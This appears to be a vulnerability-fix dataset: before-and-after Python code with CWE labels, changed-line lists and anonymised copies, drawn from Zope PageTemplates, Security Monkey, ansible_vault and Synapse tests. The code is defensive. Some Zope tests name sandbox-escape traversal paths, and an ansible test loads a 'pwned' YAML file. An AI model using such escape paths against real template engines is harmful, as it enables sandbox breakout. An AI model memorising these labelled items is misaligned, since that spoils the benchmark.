def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
def FUNC_31(self):
VAR_5 = self._makeContext()
with self.assertRaises(NotFound):
VAR_5.evaluate("context/__class__")
with self.assertRaises(NotFound):
VAR_5.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
VAR_5.evaluate("random/_itertools/repeat/foobar")
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_35(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_36(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_37(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_38(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_39(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_40(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
from zope.location.interfaces import LocationError
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_41(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
def FUNC_31(self):
VAR_5 = self._makeContext()
with self.assertRaises(NotFound):
VAR_5.evaluate("context/__class__")
with self.assertRaises((NotFound, LocationError)):
VAR_5.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises((NotFound, LocationError)):
VAR_5.evaluate("random/_itertools/repeat/foobar")
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_35(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_36(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_37(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_38(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_39(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_40(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| [
3,
7,
8,
10,
16,
19,
21,
23,
25,
28,
31,
35,
38,
44,
52,
53,
57,
61,
63,
73,
77,
81,
85,
89,
94,
98,
100,
101,
102,
105,
109,
111,
112,
117,
121,
125,
129,
133,
137,
141,
148,
154,
160,
164,
168,
172,
176,
178,
181,
182,
186,
188,
194,
195,
204,
210,
211,
213,
217,
218,
219,
224,
228,
230,
232,
235,
238,
241,
242,
244,
248,
249,
250,
254,
258,
259,
261,
274,
287,
299,
312,
313,
315,
319,
326,
331,
336,
341,
343,
348
] | [
3,
8,
9,
11,
17,
20,
22,
24,
26,
29,
32,
36,
39,
45,
53,
54,
58,
62,
64,
74,
78,
82,
86,
90,
95,
99,
101,
102,
103,
106,
110,
112,
113,
118,
122,
126,
130,
134,
138,
142,
149,
155,
161,
165,
169,
173,
177,
179,
182,
183,
187,
189,
195,
196,
205,
211,
212,
214,
218,
219,
220,
225,
229,
231,
233,
236,
239,
242,
243,
245,
249,
250,
251,
255,
259,
260,
262,
275,
288,
300,
313,
314,
316,
320,
327,
332,
337,
342,
344,
349
] |
4CWE-601
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_login import current_user, logout_user
from flask_restful import Resource
# End the Flask-Logins session
from security_monkey import rbac
class Logout(Resource):
decorators = [rbac.exempt]
def get(self):
if not current_user.is_authenticated():
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_login import current_user, logout_user
from flask_restful import Resource
# End the Flask-Logins session
from security_monkey import rbac
class Logout(Resource):
decorators = [rbac.exempt]
def get(self):
if not current_user.is_authenticated:
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
| open_redirect | {
"code": [
" if not current_user.is_authenticated():"
],
"line_no": [
28
]
} | {
"code": [
" if not current_user.is_authenticated:"
],
"line_no": [
28
]
} |
from flask_login import current_user, logout_user
from flask_restful import Resource
from security_monkey import rbac
class CLASS_0(Resource):
VAR_0 = [rbac.exempt]
def FUNC_0(self):
if not current_user.is_authenticated():
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
|
from flask_login import current_user, logout_user
from flask_restful import Resource
from security_monkey import rbac
class CLASS_0(Resource):
VAR_0 = [rbac.exempt]
def FUNC_0(self):
if not current_user.is_authenticated:
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
18,
19,
21,
22,
24,
26,
30,
33
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
18,
19,
21,
22,
24,
26,
30,
33
] |
5CWE-94
| import os
from tempfile import mkstemp
from testfixtures import ShouldRaise
from ansible.errors import AnsibleError
here = os.path.dirname(os.path.abspath(__file__))
class TestVaultLoad(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_can(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('password')
assert vault.load(open(fpath).read()) == 'test'
def test_cannot(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
vault.load(open(fpath).read())
class TestVaultDump(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_dump_file(self):
fpath = mkstemp()[1]
with open(fpath, 'w+b') as fp:
write_vault = self._makeOne('password')
write_vault.dump('test', fp)
with open(fpath, 'r+b') as fp:
read_vault = self._makeOne('password')
assert read_vault.load(fp.read()) == 'test'
os.remove(fpath)
def test_dump_text(self):
write_vault = self._makeOne('password')
dumped = write_vault.dump('test')
read_vault = self._makeOne('password')
assert read_vault.load(dumped) == 'test'
| import os
from tempfile import mkstemp
from ansible.errors import AnsibleError
from testfixtures import ShouldRaise
from yaml.constructor import ConstructorError
here = os.path.dirname(os.path.abspath(__file__))
class TestVaultLoad(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_can(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('password')
assert vault.load(open(fpath).read()) == 'test'
def test_cannot(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
vault.load(open(fpath).read())
def test_not_pwned(self):
fpath = os.path.join(here, 'file', 'pwned.txt')
vault = self._makeOne('password')
with ShouldRaise(ConstructorError):
vault.load(open(fpath).read())
class TestVaultDump(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_dump_file(self):
fpath = mkstemp()[1]
with open(fpath, 'w+b') as fp:
write_vault = self._makeOne('password')
write_vault.dump('test', fp)
with open(fpath, 'r+b') as fp:
read_vault = self._makeOne('password')
assert read_vault.load(fp.read()) == 'test'
os.remove(fpath)
def test_dump_text(self):
write_vault = self._makeOne('password')
dumped = write_vault.dump('test')
read_vault = self._makeOne('password')
assert read_vault.load(dumped) == 'test'
| remote_code_execution | {
"code": [
"from testfixtures import ShouldRaise"
],
"line_no": [
4
]
} | {
"code": [
"from yaml.constructor import ConstructorError",
" fpath = os.path.join(here, 'file', 'pwned.txt')",
" vault = self._makeOne('password')",
" with ShouldRaise(ConstructorError):",
" vault.load(open(fpath).read())"
],
"line_no": [
6,
32,
33,
34,
35
]
} | import os
from tempfile import mkstemp
from testfixtures import ShouldRaise
from ansible.errors import AnsibleError
VAR_0 = os.path.dirname(os.path.abspath(__file__))
class CLASS_0(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_2(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('password')
assert VAR_3.load(open(VAR_2).read()) == 'test'
def FUNC_3(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
VAR_3.load(open(VAR_2).read())
class CLASS_1(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_4(self):
VAR_2 = mkstemp()[1]
with open(VAR_2, 'w+b') as fp:
VAR_4 = self._makeOne('password')
VAR_4.dump('test', fp)
with open(VAR_2, 'r+b') as fp:
VAR_6 = self._makeOne('password')
assert VAR_6.load(fp.read()) == 'test'
os.remove(VAR_2)
def FUNC_5(self):
VAR_4 = self._makeOne('password')
VAR_5 = VAR_4.dump('test')
VAR_6 = self._makeOne('password')
assert VAR_6.load(VAR_5) == 'test'
| import os
from tempfile import mkstemp
from ansible.errors import AnsibleError
from testfixtures import ShouldRaise
from yaml.constructor import ConstructorError
VAR_0 = os.path.dirname(os.path.abspath(__file__))
class CLASS_0(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_2(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('password')
assert VAR_3.load(open(VAR_2).read()) == 'test'
def FUNC_3(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
VAR_3.load(open(VAR_2).read())
def FUNC_4(self):
VAR_2 = os.path.join(VAR_0, 'file', 'pwned.txt')
VAR_3 = self._makeOne('password')
with ShouldRaise(ConstructorError):
VAR_3.load(open(VAR_2).read())
class CLASS_1(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_5(self):
VAR_2 = mkstemp()[1]
with open(VAR_2, 'w+b') as fp:
VAR_4 = self._makeOne('password')
VAR_4.dump('test', fp)
with open(VAR_2, 'r+b') as fp:
VAR_6 = self._makeOne('password')
assert VAR_6.load(fp.read()) == 'test'
os.remove(VAR_2)
def FUNC_6(self):
VAR_4 = self._makeOne('password')
VAR_5 = VAR_4.dump('test')
VAR_6 = self._makeOne('password')
assert VAR_6.load(VAR_5) == 'test'
| [
3,
5,
7,
8,
10,
11,
16,
19,
24,
30,
31,
36,
39,
45,
49,
51,
55,
58
] | [
3,
7,
8,
10,
11,
16,
19,
24,
30,
36,
37,
42,
45,
51,
55,
57,
61,
64
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2017 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import encode_verify_key_base64, get_verify_key
from twisted.internet import defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class MockPerspectiveServer:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def get_verify_keys(self):
vk = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (vk.alg, vk.version): encode_verify_key_base64(vk)}
def get_signed_key(self, server_name, verify_key):
key_id = "%s:%s" % (verify_key.alg, verify_key.version)
res = {
"server_name": server_name,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {key_id: {"key": encode_verify_key_base64(verify_key)}},
}
self.sign_response(res)
return res
def sign_response(self, res):
signedjson.sign.sign_json(res, self.server_name, self.key)
@logcontext_clean
class KeyringTestCase(unittest.HomeserverTestCase):
def check_context(self, val, expected):
self.assertEquals(getattr(current_context(), "request", None), expected)
return val
def test_verify_json_objects_for_server_awaits_previous_requests(self):
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock()
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
# a signed object that we are going to try to validate
key1 = signedjson.key.generate_signing_key(1)
json1 = {}
signedjson.sign.sign_json(json1, "server10", key1)
# start off a first set of lookups. We make the mock fetcher block until this
# deferred completes.
first_lookup_deferred = Deferred()
async def first_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(keys_to_fetch, {"server10": {get_key_id(key1): 0}})
await make_deferred_yieldable(first_lookup_deferred)
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.side_effect = first_lookup_fetch
async def first_lookup():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
res_deferreds = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test10"), ("server11", {}, 0, "test11")]
)
# the unsigned json should be rejected pretty quickly
self.assertTrue(res_deferreds[1].called)
try:
await res_deferreds[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(res_deferreds[0].called)
res_deferreds[0].addBoth(self.check_context, None)
await make_deferred_yieldable(res_deferreds[0])
d0 = ensureDeferred(first_lookup())
mock_fetcher.get_keys.assert_called_once()
# a second request for a server with outstanding requests
# should block rather than start a second call
async def second_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.reset_mock()
mock_fetcher.get_keys.side_effect = second_lookup_fetch
second_lookup_state = [0]
async def second_lookup():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
res_deferreds_2 = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test")]
)
res_deferreds_2[0].addBoth(self.check_context, None)
second_lookup_state[0] = 1
await make_deferred_yieldable(res_deferreds_2[0])
second_lookup_state[0] = 2
d2 = ensureDeferred(second_lookup())
self.pump()
# the second request should be pending, but the fetcher should not yet have been
# called
self.assertEqual(second_lookup_state[0], 1)
mock_fetcher.get_keys.assert_not_called()
# complete the first request
first_lookup_deferred.callback(None)
# and now both verifications should succeed.
self.get_success(d0)
self.get_success(d2)
def test_verify_json_for_server(self):
kr = keyring.Keyring(self.hs)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), 1000))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should succeed on a signed object
d = _verify_json_for_server(kr, "server9", json1, 500, "test signed")
# self.assertFalse(d.called)
self.get_success(d)
def test_verify_json_for_server_with_null_valid_until_ms(self):
"""Tests that we correctly handle key requests for keys we've stored
with a null `ts_valid_until_ms`
"""
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(return_value=make_awaitable({}))
kr = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), mock_fetcher)
)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), None))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should fail on a signed object with a non-zero minimum_valid_until_ms,
# as it tries to refetch the keys and fails.
d = _verify_json_for_server(
kr, "server9", json1, 500, "test signed non-zero min"
)
self.get_failure(d, SynapseError)
# We expect the keyring tried to refetch the key once.
mock_fetcher.get_keys.assert_called_once_with(
{"server9": {get_key_id(key1): 500}}
)
# should succeed on a signed object with a 0 minimum_valid_until_ms
d = _verify_json_for_server(
kr, "server9", json1, 0, "test signed with zero min"
)
self.get_success(d)
def test_verify_json_dedupes_key_requests(self):
"""Two requests for the same key should be deduped."""
key1 = signedjson.key.generate_signing_key(1)
async def get_keys(keys_to_fetch):
# there should only be one request object (with the max validity)
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(side_effect=get_keys)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
# the first request should succeed; the second should fail because the key
# has expired
results = kr.verify_json_objects_for_server(
[("server1", json1, 500, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to the fetcher
mock_fetcher.get_keys.assert_called_once()
def test_verify_json_falls_back_to_other_fetchers(self):
"""If the first fetcher cannot provide a recent enough key, we fall back"""
